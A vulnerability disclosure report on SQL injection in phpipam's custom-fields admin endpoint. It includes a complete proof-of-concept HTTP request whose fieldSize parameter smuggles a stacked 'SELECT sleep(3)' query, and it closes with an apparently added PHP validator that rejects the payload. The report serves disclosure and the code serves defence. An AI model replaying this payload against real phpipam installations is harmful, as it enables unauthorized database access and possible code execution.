SQL Injection in Custom Fields in phpipam/phpipam
Reported on Feb 10th 2023
Description
SQL injection when updating custom fields in the admin panel.
Malicious web admins can send POST /app/admin/custom-fields/edit-result.php
with the parameters fieldType=set&fieldSize='1') CHARACTER SET utf8; SELECT sleep(3); #
to execute the injected SQL command SELECT sleep(3);,
which delays the response to this POST by an additional 3 seconds. Note that SELECT sleep(3);
is used here only as an example; an attacker can inject arbitrary SQL commands (even OS commands, through the system
command in SQL).
Proof of Concept
POST /app/admin/custom-fields/edit-result.php HTTP/2
Host: demo.phpipam.net
Cookie: table-page-size=50; phpipam=v0d720v6gkk435n12a682fbo3u
Content-Length: 212
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.phpipam.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.phpipam.net/administration/custom-fields/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
name=Ticketnummer&oldname=custom_Ticketnummer&action=edit&table=ipaddresses&csrf_cookie=HNLec2zon3Q0rBRXgIY_QxBaajHsmqAB&Comment=&fieldType=set&fieldSize='1') CHARACTER SET utf8; SELECT sleep(3); #&fieldDefault=
Impact
This vulnerability allows authenticated admins to perform SQL injection. A successful attack may result in the selection of entire tables and, in certain cases, in the attacker gaining administrative rights to the database, writing files to the server leading to Remote Code Execution, stored XSS, or writing a script to extract data.
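As an added illustration of the kind of fix this endpoint needs (this is not phpipam's code; the function names and the list of field types are assumptions), a hypothetical PHP validator that allow-lists fieldSize per fieldType and rebuilds the ALTER TABLE statement only from validated parts, since DDL cannot take bound parameters:

```php
<?php
// Added example, not phpipam's code; type list and function names are assumptions.
// ALTER TABLE cannot use bound parameters, so the size value is rebuilt from
// allow-listed parts instead of being interpolated as received.
function validate_field_size(string $fieldType, string $fieldSize): ?string
{
    switch ($fieldType) {
        case 'varchar':
        case 'int':
            // A plain column width: digits only, within a sane range.
            return preg_match('/^[1-9][0-9]{0,4}$/', $fieldSize) ? $fieldSize : null;
        case 'set':
        case 'enum':
            // Comma-separated quoted members. Commas are not allowed inside a
            // member, so splitting on ',' is exact; the character class excludes
            // quotes, parentheses, semicolons and comment markers.
            $members = [];
            foreach (explode(',', $fieldSize) as $m) {
                if (!preg_match('/^\'[A-Za-z0-9 _.\-]{1,64}\'$/', $m)) {
                    return null;
                }
                $members[] = $m;
            }
            return implode(',', $members);
        default:
            // Types without a size (text, date, ...) must send none.
            return $fieldSize === '' ? '' : null;
    }
}
// Identifiers are restricted to [A-Za-z0-9_] and backtick-quoted; the type
// must come from a fixed list (assumed here), never from the raw request.
function build_alter(string $table, string $column, string $type, string $size): ?string
{
    $allowedTypes = ['varchar', 'int', 'set', 'enum', 'text', 'date'];
    if (!in_array($type, $allowedTypes, true)) { return null; }
    $ident = '/^[A-Za-z0-9_]{1,64}$/';
    if (!preg_match($ident, $table) || !preg_match($ident, $column)) { return null; }
    $validSize = validate_field_size($type, $size);
    if ($validSize === null) { return null; }
    $suffix = $validSize === '' ? '' : "($validSize)";
    return "ALTER TABLE `$table` MODIFY COLUMN `$column` $type$suffix";
}
// Constructed inputs: the payload from the report, then a benign definition.
$payload = "'1') CHARACTER SET utf8; SELECT sleep(3); #";
foreach ([$payload, "'1','2','3'"] as $size) {
    $sql = build_alter('ipaddresses', 'custom_Ticketnummer', 'set', $size);
    echo ($sql === null ? 'rejected: ' : 'accepted: ') . $size . PHP_EOL;
}
```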